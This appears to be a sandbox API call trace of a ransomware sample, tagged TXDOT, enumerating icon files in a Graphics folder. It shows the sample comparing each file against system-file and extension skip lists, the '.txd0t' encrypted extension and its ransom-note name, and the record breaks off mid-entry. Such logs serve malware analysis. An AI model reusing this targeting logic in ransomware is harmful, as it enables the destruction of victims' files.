1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="ntuser.dat") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="ntldr") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="ntdetect.com") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="bootfont.bin") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.850] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0128.850] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.850] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0128.850] StrCmpW (psz1="Rotate3.ico", psz2=".") returned 1 [0128.850] StrCmpW (psz1="Rotate3.ico", psz2="..") returned 1 [0128.850] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.850] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.850] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate3.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" [0128.850] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0128.850] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.850] StrCmpIW (psz1="Rotate3.ico", psz2="bootsect.bak") returned 1 [0128.850] StrCmpIW (psz1="Rotate3.ico", psz2="iconcache.db") returned 1 [0128.850] StrCmpIW (psz1="Rotate3.ico", psz2="thumbs.db") returned -1 [0128.850] StrCmpIW (psz1="Rotate3.ico", psz2=" ransomware ") returned 1 [0128.850] StrCmpIW (psz1="Rotate3.ico", psz2=" ransom ") returned 1 [0128.850] StrCmpIW (psz1="Rotate3.ico", psz2="debug.txt") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="boot.ini") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="desktop.ini") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="autorun.inf") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="ntuser.dat") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="ntldr") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="ntdetect.com") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="bootfont.bin") returned 1 [0128.851] StrCmpIW (psz1="Rotate3.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.851] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0128.851] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.851] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0128.851] StrCmpW (psz1="Rotate4.ico", psz2=".") returned 1 [0128.851] StrCmpW (psz1="Rotate4.ico", psz2="..") returned 1 [0128.851] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.851] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.851] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate4.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" [0128.851] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0128.851] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="bootsect.bak") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="iconcache.db") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="thumbs.db") returned -1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2=" ransomware ") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2=" ransom ") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="debug.txt") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="boot.ini") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="desktop.ini") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="autorun.inf") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="ntuser.dat") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="ntldr") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="ntdetect.com") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="bootfont.bin") returned 1 [0128.851] StrCmpIW (psz1="Rotate4.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.851] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0128.851] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.851] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0128.852] StrCmpW (psz1="Rotate5.ico", psz2=".") returned 1 [0128.852] StrCmpW (psz1="Rotate5.ico", psz2="..") returned 1 [0128.852] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.852] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.852] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate5.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" [0128.852] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0128.852] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="bootsect.bak") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="iconcache.db") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="thumbs.db") returned -1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2=" ransomware ") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2=" ransom ") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="debug.txt") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="boot.ini") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="desktop.ini") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="autorun.inf") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="ntuser.dat") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="ntldr") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="ntdetect.com") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="bootfont.bin") returned 1 [0128.852] StrCmpIW (psz1="Rotate5.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.852] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0128.852] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.852] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0128.852] StrCmpW (psz1="Rotate6.ico", psz2=".") returned 1 [0128.852] StrCmpW (psz1="Rotate6.ico", psz2="..") returned 1 [0128.852] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.852] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.852] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate6.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" [0128.852] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0128.852] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.852] StrCmpIW (psz1="Rotate6.ico", psz2="bootsect.bak") returned 1 [0128.852] StrCmpIW (psz1="Rotate6.ico", psz2="iconcache.db") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="thumbs.db") returned -1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2=" ransomware ") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2=" ransom ") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="debug.txt") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="boot.ini") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="desktop.ini") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="autorun.inf") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="ntuser.dat") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="ntldr") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="ntdetect.com") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="bootfont.bin") returned 1 [0128.853] StrCmpIW (psz1="Rotate6.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.853] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0128.853] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.853] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0128.853] StrCmpW (psz1="Rotate7.ico", psz2=".") returned 1 [0128.853] StrCmpW (psz1="Rotate7.ico", psz2="..") returned 1 [0128.853] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.853] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.853] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate7.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" [0128.853] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0128.853] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="bootsect.bak") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="iconcache.db") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="thumbs.db") returned -1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2=" ransomware ") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2=" ransom ") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="debug.txt") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="boot.ini") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="desktop.ini") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="autorun.inf") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="ntuser.dat") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="ntldr") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="ntdetect.com") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="bootfont.bin") returned 1 [0128.853] StrCmpIW (psz1="Rotate7.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.854] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0128.854] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.854] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0128.854] StrCmpW (psz1="Rotate8.ico", psz2=".") returned 1 [0128.854] StrCmpW (psz1="Rotate8.ico", psz2="..") returned 1 [0128.854] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.854] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.854] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate8.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" [0128.854] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0128.854] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="bootsect.bak") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="iconcache.db") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="thumbs.db") returned -1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2=" ransomware ") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2=" ransom ") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="debug.txt") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="boot.ini") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="desktop.ini") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="autorun.inf") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="ntuser.dat") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="ntldr") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="ntdetect.com") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="bootfont.bin") returned 1 [0128.854] StrCmpIW (psz1="Rotate8.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.854] PathFindExtensionW (pszPath="Rotate8.ico") returned=".ico" [0128.854] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.854] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0128.854] StrCmpW (psz1="Save.ico", psz2=".") returned 1 [0128.854] StrCmpW (psz1="Save.ico", psz2="..") returned 1 [0128.854] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.854] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.854] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Save.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Save.ico" [0128.854] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0128.854] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="bootsect.bak") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="iconcache.db") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="thumbs.db") returned -1 [0128.855] StrCmpIW (psz1="Save.ico", psz2=" ransomware ") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2=" ransom ") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="debug.txt") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="boot.ini") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="desktop.ini") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="autorun.inf") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="ntuser.dat") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="ntldr") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="ntdetect.com") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="bootfont.bin") returned 1 [0128.855] StrCmpIW (psz1="Save.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.855] PathFindExtensionW (pszPath="Save.ico") returned=".ico" [0128.855] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.855] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0128.855] StrCmpW (psz1="Setup.ico", psz2=".") returned 1 [0128.855] StrCmpW (psz1="Setup.ico", psz2="..") returned 1 [0128.855] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.855] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.855] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Setup.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" [0128.855] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0128.855] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="bootsect.bak") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="iconcache.db") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="thumbs.db") returned -1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2=" ransomware ") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2=" ransom ") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="debug.txt") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="boot.ini") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="desktop.ini") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="autorun.inf") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="ntuser.dat") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="ntldr") returned 1 [0128.855] StrCmpIW (psz1="Setup.ico", psz2="ntdetect.com") returned 1 [0128.856] StrCmpIW (psz1="Setup.ico", psz2="bootfont.bin") returned 1 [0128.856] StrCmpIW (psz1="Setup.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.856] PathFindExtensionW (pszPath="Setup.ico") returned=".ico" [0128.856] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.856] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, 